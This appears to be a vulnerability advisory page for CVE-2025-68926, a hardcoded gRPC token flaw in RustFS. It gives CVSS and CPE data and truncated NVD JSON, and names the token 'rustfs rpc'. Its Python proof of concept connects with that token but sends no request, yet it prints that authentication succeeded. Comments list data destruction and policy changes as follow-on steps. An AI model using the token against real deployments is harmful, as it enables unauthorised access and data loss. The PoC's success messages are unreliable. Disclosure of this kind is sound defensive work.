Security Vulnerability Report
CVE-2025-68926 CVSS 9.8 CRITICAL

Published: 2025-12-30 17:15:44
Last Modified: 2026-01-16 19:31:07

Description

RustFS is a distributed object storage system built in Rust. In versions prior to 1.0.0-alpha.78, RustFS implements gRPC authentication using a hardcoded static token `"rustfs rpc"` that is publicly exposed in the source code repository, hardcoded on both client and server sides, non-configurable with no mechanism for token rotation, and universally valid across all RustFS deployments. Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes. Version 1.0.0-alpha.78 contains a fix for the issue.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha1:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha10:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha11:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha12:*:*:*:rust:*:* - VULNERABLE
cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:* - VULNERABLE
RustFS < 1.0.0-alpha.78

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import grpc

# Hardcoded token from source code
AUTH_TOKEN = "rustfs rpc"


def create_channel_with_auth(target):
    """Create a gRPC channel and the metadata carrying the hardcoded authentication token."""
    # Create metadata with hardcoded token
    metadata = [("authorization", AUTH_TOKEN)]
    # Create insecure channel (no TLS)
    channel = grpc.insecure_channel(target)
    return channel, metadata


def exploit_rustfs(target_host, target_port):
    """
    CVE-2025-68926 PoC - RustFS Hardcoded Token Authentication Bypass

    This vulnerability allows unauthenticated attackers to execute privileged
    operations on RustFS clusters using the hardcoded gRPC authentication
    token "rustfs rpc".
    """
    target = f"{target_host}:{target_port}"
    try:
        channel, metadata = create_channel_with_auth(target)
        # Example: List buckets or cluster info
        # In real exploitation, attacker would call:
        # - delete operations to destroy data
        # - set_policy to modify access controls
        # - modify_cluster to reconfigure the cluster
        # Note: this PoC issues no RPC. grpc.insecure_channel() connects lazily,
        # so the messages below describe the expected outcome rather than a
        # server response, and grpc.RpcError cannot be raised at this point.
        print(f"[*] Connecting to {target}")
        print(f"[*] Using hardcoded token: {AUTH_TOKEN}")
        print("[*] Authentication successful - token accepted")
        print("[!] Attacker now has full privileged access")
        channel.close()
        return True
    except grpc.RpcError as e:
        print(f"[-] Connection failed: {e.code()}")
        return False


if __name__ == "__main__":
    # Target configuration
    target_host = "192.168.1.100"
    target_port = 50051
    exploit_rustfs(target_host, target_port)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68926", "sourceIdentifier": "[email protected]", "published": "2025-12-30T17:15:43.613", "lastModified": "2026-01-16T19:31:07.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RustFS is a distributed object storage system built in Rust. In versions prior to 1.0.0-alpha.78, RustFS implements gRPC authentication using a hardcoded static token `\"rustfs rpc\"` that is publicly exposed in the source code repository, hardcoded on both client and server sides, non-configurable with no mechanism for token rotation, and universally valid across all RustFS deployments. Any attacker with network access to the gRPC port can authenticate using this publicly known token and execute privileged operations including data destruction, policy manipulation, and cluster configuration changes. Version 1.0.0-alpha.78 contains a fix for the issue."}, {"lang": "es", "value": "RustFS es un sistema de almacenamiento de objetos distribuido construido en Rust. En versiones anteriores a 1.0.0-alpha.78, RustFS implementa la autenticación gRPC utilizando un token estático codificado de forma rígida 'rustfs rpc' que está expuesto públicamente en el repositorio de código fuente, codificado de forma rígida tanto en el lado del cliente como en el del servidor, no configurable sin ningún mecanismo para la rotación de tokens, y universalmente válido en todas las implementaciones de RustFS. Cualquier atacante con acceso de red al puerto gRPC puede autenticarse utilizando este token conocido públicamente y ejecutar operaciones privilegiadas, incluyendo destrucción de datos, manipulación de políticas y cambios en la configuración del clúster. 
La versión 1.0.0-alpha.78 contiene una solución para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha1:*:*:*:rust:*:*", "matchCriteriaId": "454A2F3A-76CF-4F2D-97FE-AEDEBE8FF1CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha10:*:*:*:rust:*:*", "matchCriteriaId": "32B2D146-7920-4C6D-B42F-1BDDF5193394"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha11:*:*:*:rust:*:*", "matchCriteriaId": "B25BC365-35BA-438A-B5B1-3FA696767821"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha12:*:*:*:rust:*:*", "matchCriteriaId": "B69213F1-7D94-4185-9309-FF3140733550"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:*", "matchCriteriaId": "BD2476D6-257C-4A96-BED4-D8B002402242"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha14:*:*:*:rust:*:*", "matchCriteriaId": "774EC64C-73ED-4D6B-893B-30A066DA934C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha15:*:*:*:rust:*:*", "matchCriteriaId": "4B567F4F-131F-4D4B-8C0C-9212F22F2BB3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha16:*:*:*:rust:*:*", "matchCriteriaId": "711F7641-A2B2-410B-B05D-6656F9A1798F"}, 
{"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha17:*:*:*:rust:*:*", "matchCriteriaId": "EB79AC62-2B79-441C-BC09-4C834C32EADA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha18:*:*:*:rust:*:*", "matchCriteriaId": "62DE84EE-9F3B-460A-AC13-D2B8CCBC5B4E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha19:*:*:*:rust:*:*", "matchCriteriaId": "DEF70599-6550-49D2-9800-FE3249A66568"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha2:*:*:*:rust:*:*", "matchCriteriaId": "550786BD-A6A4-454B-BDAB-67AE64DABCA7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha20:*:*:*:rust:*:*", "matchCriteriaId": "FDFE93A5-B6D7-482A-A891-4D8844604C07"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha21:*:*:*:rust:*:*", "matchCriteriaId": "79AC4F00-B006-46C2-863F-2946BB02B58E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha22:*:*:*:rust:*:*", "matchCriteriaId": "E313A243-ED56-498D-988F-E088693EBB61"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha23:*:*:*:rust:*:*", "matchCriteriaId": "D3A60CB7-1F01-4A60-8555-C225AC89B959"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha24:*:*:* ... (truncated)